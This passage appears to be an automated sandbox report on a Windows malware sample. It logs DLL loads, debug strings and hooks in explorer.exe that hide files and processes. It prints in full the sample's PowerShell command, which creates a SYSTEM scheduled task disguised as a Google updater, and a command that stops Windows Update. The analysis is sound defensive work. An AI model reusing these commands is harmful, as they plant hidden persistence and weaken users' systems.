      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000020.00000002.2924184797.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830913741.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.2924184797.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830913741.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000020.00000002.2924184797.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830913741.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000020.00000002.2924184797.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830913741.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000020.00000002.2925161775.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1830984027.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000020.00000000.1831035809.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.2925727518.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Users\user\AppData\Local\Temp\svc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tcvsvxpo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
      Source: svc.exe.1.drStatic PE information: section name: .xdata
      Source: updater.exe.4.drStatic PE information: section name: .xdata
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00C036C9 push ebx; iretd 1_2_00C036DA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B7AD2A5 pushad ; iretd 17_2_00007FFD9B7AD2A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B8C085B push E95B7C1Ch; ret 17_2_00007FFD9B8C0909
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B8C7B9A push eax; ret 17_2_00007FFD9B8C7B99
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B8C7B8A push eax; ret 17_2_00007FFD9B8C7B99
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B8C3A79 pushad ; ret 17_2_00007FFD9B8C3AC9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B8C3A36 pushad ; ret 17_2_00007FFD9B8C3AC9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B8C1233 push cs; iretd 17_2_00007FFD9B8C1292
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B8C088D push E95B7C1Ch; ret 17_2_00007FFD9B8C0909
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B993450 pushfd ; iretd 17_2_00007FFD9B993451
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B992852 push FFFFFFA8h; iretd 17_2_00007FFD9B992854
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B996D18 pushad ; retf 17_2_00007FFD9B996D19
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC6222B8 push rdx; retf 23_2_00000225DC6222B9
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC6284FD push rcx; retf 003Fh23_2_00000225DC6284FE
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC6594FD push rcx; retf 003Fh23_2_00000225DC6594FE
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AC22B8 push rdx; retf 24_2_00000202C0AC22B9
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AC84FD push rcx; retf 003Fh24_2_00000202C0AC84FE
      Source: C:\Windows\System32\lsass.exeCode function: 24_2_00000202C0AF94FD push rcx; retf 003Fh24_2_00000202C0AF94FE
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A6612E22B8 push rdx; retf 25_2_000002A6612E22B9
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A6612E84FD push rcx; retf 003Fh25_2_000002A6612E84FE
      Source: C:\Windows\System32\svchost.exeCode function: 25_2_000002A6613194FD push rcx; retf 003Fh25_2_000002A6613194FE
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAED922B8 push rdx; retf 26_2_000002BAAED922B9
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAED984FD push rcx; retf 003Fh26_2_000002BAAED984FE
      Source: C:\Windows\System32\dwm.exeCode function: 26_2_000002BAAEDC94FD push rcx; retf 003Fh26_2_000002BAAEDC94FE
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879A84FD push rcx; retf 003Fh27_2_0000026A879A84FE
      Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000026A879A22B8 push rdx; retf 27_2_0000026A879A22B9
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537884FD push rcx; retf 003Fh28_2_00000179537884FE
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537822B8 push rdx; retf 28_2_00000179537822B9
      Source: C:\Windows\System32\svchost.exeCode function: 28_2_00000179537B94FD push rcx; retf 003Fh28_2_00000179537B94FE
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D5422B8 push rdx; retf 29_2_000002295D5422B9
      Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002295D5484FD push rcx; retf 003Fh29_2_000002295D5484FE
      Source: C:\Users\user\AppData\Local\Temp\svc.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\svc.exeFile created: C:\Users\user\AppData\Local\Temp\nhylsjsvllxf.tmpJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\svc.exeJump to dropped file
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Users\user\AppData\Local\Temp\svc.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\NHYLSJSVLLXF.TMP
      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
